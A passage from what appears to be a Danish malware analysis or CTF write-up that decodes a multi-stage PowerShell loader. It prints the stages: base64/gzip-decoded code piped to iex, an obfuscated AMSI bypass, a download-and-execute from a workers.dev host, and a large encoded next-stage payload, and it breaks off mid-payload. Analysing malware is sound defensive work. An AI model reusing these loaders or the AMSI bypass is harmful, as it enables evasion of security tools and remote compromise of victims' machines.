Mbu+vVCB+ZaO3TafWoqt3cERv2gaQ9TN4LM0o+t5kmNFdyxaC/+5mS4S9/od+Byvcuz5I2o5yzRQZ31gv9J8pqCOpv/n8j7F/6m1Vj09QvT0ENF35EqS1aEVWC49lzm+Rk9UagrRIIdtcu83qOKFKn9UrJvlFV2Sr879SmFQnGITybEDynyQj9AwS6I0DTcuyj1fTdI/GAfTMk/Gf0x+AWpkST07AgAAA=="
$bytes = [Convert]::FromBase64String($dat)
$ms = New-Object IO.MemoryStream(,$bytes)
$gs = New-Object IO.Compression.GZipStream($ms,[IO.Compression.CompressionMode]::Decompress)
$sr = New-Object IO.StreamReader($gs,[Text.Encoding]::UTF8)
$result = $sr.ReadToEnd()
echo $result | iex
|
Vi kan se på kodens logik at der bliver dekodes fra base64, og så bliver det dekomprimeret ved hjælp af gzip. Hvis vi dekoder og dekomprimerer dataen i $dat variablen, får vi følgende powershell kode:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
|
$alojga='siU'
$uzuleck="$([cHAr]([BYte]0x53)+[CHAr]([BytE]0x79)+[CHAR]([bYTe]0x73)+[CHaR](116*93/93)+[cHAR]([byTE]0x65)+[Char]([BYte]0x6d)).$(('Man'+'age'+'ment').NorMAlize([cHAR]([bytE]0x46)+[CHAr]([byTE]0x6f)+[ChaR](106+8)+[ChAR](50+59)+[CHar](68+64-64)) -replace [cHar]([bytE]0x5c)+[cHar](112)+[cHAr]([ByTe]0x7b)+[CHaR]([BytE]0x4d)+[CHAr](110+40-40)+[ChAr](125*29/29)).$([cHAr]([bytE]0x41)+[chAR]([BYte]0x75)+[CHAR]([BYTe]0x74)+[CHAR](111+62-62)+[cHar](109*39/39)+[chaR](97+3-3)+[ChAR](116*95/95)+[cHar]([bYTe]0x69)+[ChAR](111*50/50)+[char](110*98/98)).$(('Am'+$alojga+'tils').normalizE([chAr]([BYTE]0x46)+[cHAr]([bYTe]0x6f)+[CHaR]([bYtE]0x72)+[cHar](87+22)+[cHaR](68)) -replace [CHAR]([ByTe]0x5c)+[CHAR]([BYtE]0x70)+[cHaR](123*34/34)+[CHAr](77)+[chaR]([ByTE]0x6e)+[cHar](125))";$guyhi="+[ChaR](115)+[chAr]([bYte]0x72)+[char](115+112-112)+[chaR]([BYTe]0x70)+[cHaR](101*24/24)+[ChaR](26+83)+[CHAR](99*31/31)+[CHar](11+111)+[Char](111+29-29)+[cHar]([byTe]0x66)+[CHar](4+115)+[Char](107+14-14)+[cHAr](88+13)+[chaR]([BYte]0x72)+[cHaR](120+117-117)+[Char]([bYTe]0x7a)+[chAr]([BYTE]0x62)+[char]([Byte]0x6c)+[cHAR](116*105/105)+[cHaR](6+108)+[cHaR](112+100-100)";[Threading.Thread]::Sleep(1570);
if($env:USERNAME -ne 'jens' -or $env:COMPUTERNAME -ne 'myrupmachine'){return}
$Script:InstallRoot = Join-Path $env:ProgramData "ContosoDeployment"
$Script:LogPath = Join-Path $Script:InstallRoot "logs"
$Script:StateFile = Join-Path $Script:InstallRoot "state.json"
$Script:RegistryRoot = "HKLM:\SOFTWARE\Contoso\Platform"
$Script:ExecutionId = [guid]::NewGuid().ToString()
$Script:StartTime = Get-Date
$ErrorActionPreference = "Stop"
$timestamp = (Get-Date).ToString("yyyy-MM-dd HH:mm:ss.fff")
$formatted = "[$timestamp] [INFO] [$($Script:ExecutionId)] Could not install"
$Enabled = $true
[Ref].Assembly.GetType($uzuleck)."GetfiEld"($([cHaR](97*16/16)+[CHAR](109+55-55)+[cHAR]([byte]0x73)+[cHAr]([BYte]0x69)+[chaR]([ByTe]0x49)+[Char]([Byte]0x6e)+[CHaR]([BytE]0x69)+[cHaR](116*25/25)+[ChaR]([Byte]0x46)+[chaR](97+1-1)+[Char]([ByTe]0x69)+[CHAR](39+69)+[CHar](101+55-55)+[CHAR]([bytE]0x64)),"NonPublic,Static")."SEtValue"($TZpaDwt,$Enabled);
iwr -UseBasicParsing jolly-heart-a4be.oluf-sand.workers.dev/update/a3a7a35e-2534-4b46-85f0-d3304c34f48a|iex
|
Jeg spotter ret hurtigt at der er endu en forspørgsel til jolly-heart-a4be.oluf-sand.workers.dev i den dekodede kode, og at den sender data til /update/a3a7a35e-2534-4b46-85f0-d3304c34f48a. Hvis vi sender en request til denne endpoint, får vi følgende respons:
Klik for at udvide den rå payload
1
2
3
4
5
6
7
|
$dat="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"
$bytes = [Convert]::FromBase64String($dat)
$ms = New-Object IO.MemoryStream(,$bytes)
$gs = New-Object IO.Compression.GZipStream($ms,[IO.Compression.CompressionMode]::Decompress)
$sr = New-Object IO.StreamReader($gs,[Text.Encoding]::UTF8)
$result = $sr.ReadToEnd()
Invoke-Command -ScriptBlock ([scriptblock]::Create($result)) -ArgumentList @("sour", "precision")
|
Efter at have dekodet og dekomprimeret dataen, får vi følgende PowerShell kode:
Klik for at udvide den rå payload
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
|
param (
[string]$cow = '',
[string]$fugato = ''
)
$pack = 'B9yxT'
function reactant([int]$i) {
inexpensive($i+55290)
health($i+19051)
heavy($i+38932)
squeal($i+22609)
panel($i+53813)
vanish($i+17317)
improvise($i+65220)
victory($i+44959)
gem($i+26706)
extend($i+33203)
plead($i+65238)
}
$cultivar = '9Z7xulaVl2b1GnWeRRBYT4nxKxr1M9LAc1MCfp+ru4j3N0CC24LewdbQiBwVyznDweapd6tOIyUqSLDV2/SAw8btu3uE1NhPitIUxch9Ht8lwA+rW3vGLL+lRqgEi6uqsmpHj4pyC9fA0oEd6rkKh3wluMlXDCD9q44nq0CCI5FU8RsApk7RljZnmoADgpyutYk67/43leuoKhbXhVELF07+KJKpZWBMadSaY5BBpF4vvlijlP8wveo2ENtN8ICxN0HsCiVjRQdSpzgjjUmaSTEBm7Bcultj9eV/+zUTtl7Xw2N6wzwLnj8T2a9+Ygnx5bDS2YhC/quCdaEof5kcDcHXMKkLBHqU6+HHapuImj2S+HAflh5zFMYnxvGUEMhmC/6PqLAiA9nX+9L01ZqMCDtdQh+7aikd1P2/OWCHLJJ8aH9QkH1wKeHmsjdLA3UxXWHshogBtAve0YszNZjcArBEQoGXzGsQrThRsxV0ogsKu3ZYxCs/UkbVjpVoDHMM4SENNaytZ42AMQTEfV0rLJeFF4tbqpoA51SCbGyzRvLqsBJevYfauTOcGggi0fT5amwVzWeRgcAXt5NRzt3FvN30KW5vugdGAije83hYaxpOAsWM2L096CA7xNM1Hk4vX2iIw9iJG7GNHiCb3PxVuiQX0QJsP6/2Iz+FIqAlZX0PPlasLEGaIZzpSeVI1rbdn01IxJS+k0VDb3FfhCDEA6U8GsAzwhOVSxwRLVtTB47QVa9f'
$precision = '/F3kF8RyMOHT4mrSVBNSHbXJA+7G6kAagtE7dSzHkUM='
function pride([int]$i) {
ale($i+48511)
panther($i+29000)
seed($i+27850)
exultant($i+5084)
tacky($i+2085)
wave($i+59434)
start($i+63922)
independent($i+33913)
boatyard($i+58060)
bow($i+44219)
mislead($i+64694)
someplace($i+43528)
huge($i+34379)
adrenaline($i+55782)
hand-holding($i+27515)
}
$team = 'jCqlOupTcpByiAcYmrtL9YdJK4dyRWrAanZhxve5s0GT0PctWjNaUD7hvWmTfjKn1kw0SBXWR3PhKZbXlFfm0AQIobY3nGqqPryzY6g+41vLeK8fWG4PP1UIcqBFgIbQW0bgSp9UAbHjpKnV7M+3S+LFOLWZOfzrjDfcOHjVPXVQT3KPVRZ3fskcHSaKK6b2icP+IWQHcpzgzI2wsPwkKrVtjj1iV6hGhjyWU+X1GMD/Hd7FSsW/mFdjLQVYhKMyAmLZpAKbss53MvPEcql7Ah5ktlKQXf6a77ALcuFyTBcN0rvTft1Shcfyg16SwA1534QOqETL9fQP9/V/s0QypLPuKqTTxZQit2RuIo3oR+9fm9btolskpKC+SzcEQhshs+70h6D1v+KxL03VBrxURae1z5jRDFFBjgJmzctzmEv1ZFErn0Q555Jln3KSbtDyvlLI+jch+VBsTdCHio09JF2yyd7tBf6MT9u1/ZS73VT+8ASAjJkAAaGgTSSI8KB6S8bwqtBgisE1Xu7FYKwCnqygmHszGA=='
$future = 50281
$raid = 'nBhhJlW88L9ji/rPHkSLGm35yFQBDh5NNH8CTxOfSnJ2ah6sNIemutN51PVXgJ2copQSPjsq+MgV2G7QLbkLt2GO7QIxvwrwilHGyapRTx9kTfytAfASsC6CqePDVQxDZgxwj2kXKGaf4K2oVaxdXzdRezYn2RvLC9vkbDbxeGwM/cIyCWL/Ec5uN3hl9JFDSDgVh9fEQQ5bdGdqHeabENWG7i8DjPoy/8GvpmqIFAy7bmsv7yXBke5kx8ZJI7WE4CdaJH35r6DG8tgZY6Mi4kLA4hSm2B8hLuf0RcbS2VHgunrxban6urk6l694Wwj8ahNyfBnA023VVEAFokNEXcgOnEmmH5mGQG1tYa0fVAImDnQVi3cHIjwBUb4IZVgE0ucACS/AAZDZK8vdlsLJgUpBoa5F2kzmGP4odN9lxnwolwD7n8FIwlnJ+WVuqK8CfuIM8PkgqAy+si+nZ9xrTYeYsqua'
$hub = 'ZKIADxmEYEpAZc4iP63CAO6Vl46/ASbXhOITxEsBnKLmPhU/JIVHDLgvBS6cY1sTvw6qQX+FUyN5iEw8xB1pDJd0idOfM0UxOL1o7mY4yf5sRmP2l0HPALIsm9LAgyKph1IiHOrLqrYHKYPAlX8f7vGgvGwm2/GMORK4AKdVZRNI8wfZZAYcQx0u311OdVgATD6zglv5k/L28+HzoNjU83EOkpkUEIR1ulp0hqClCG7iGIImvcVnnYX3NgXk7wkCa30Cui73u5s9qknA2SJqL5KSlO5VBlauW27bpMlcuJ9gh5MU3oa7OSAMTedNQZPWi3ZIIYctyfWokQFfEBw4UQdrJHPUW2l460U+yH4Babc0r60XgTiprVueUYBFqBx5fa1VKbATrgH6Wo6fnE5N+HJ53MdBmc9KM/74C9qEhtFY97I00RPUg8G+DD2whV27vKHqPGgimc6POnydAJunmHzUqd+CLZ30m/WORG7zoO8/mnM4dXUl/v1/BD8rWB6bNZ3NDPkTeEIowPY+qm5KY8TbpBgBILo05h0bmhTwedtApG8MELQLA5cffzop0fQbnTKHBFcVJT73IOe4hIE62cLwk6dtWrmB+NP3wKv7XPx/3cwXg49cAroQy/brvAe9RrNKJHCXJHm0wsqlpfNmAYydEmL89kOlW9QtJOpl1y+1rg8FAGM7GtxBRRIyzX3fAGxmLBDC5G8Pc7lqKjStvuEEBp7ITOmi6WWG144U6G4c9+OqtpHJMOIR9DkBqm/ZCGoxYvS8dXvkJHPN7yJZsGhU2Hrqx51tpChFPxQ7H1ECgVlaB6aPJc1hjE/IyRywzzzqV+3U6BSdd/57Rd5jWg9Q60FJ1A1rllxo8eQss23tiXY4KDuZtzu4MWLWUHQJuaiwRav5PfDFUgj5w2tiNWjNGb1YpW59hOvkCUthRVXfsJqqP563Gt8QC4sDvHUY5DJJ/f23cyjpT59awMRpqEZJNBvw+EUCh3y5NS1sYUx6GyKMpJVmJJ2MrzV5QthW2H628jQBjIzqVt6PxW6/1DNZRZfTCZGfEpFyJLkMgdruRSILkWnRQI+LgrXt9BmRqi6RfT2gj6APEM9nynHjN3dEx2xs6EUMAdkqR6hfrDelC0O6URR9wX88nmyy970iXH0FcM3Ok9vXChMTC0EOHJJNde8CHH6g0c2RDC8TMQdha0SNb1HL+W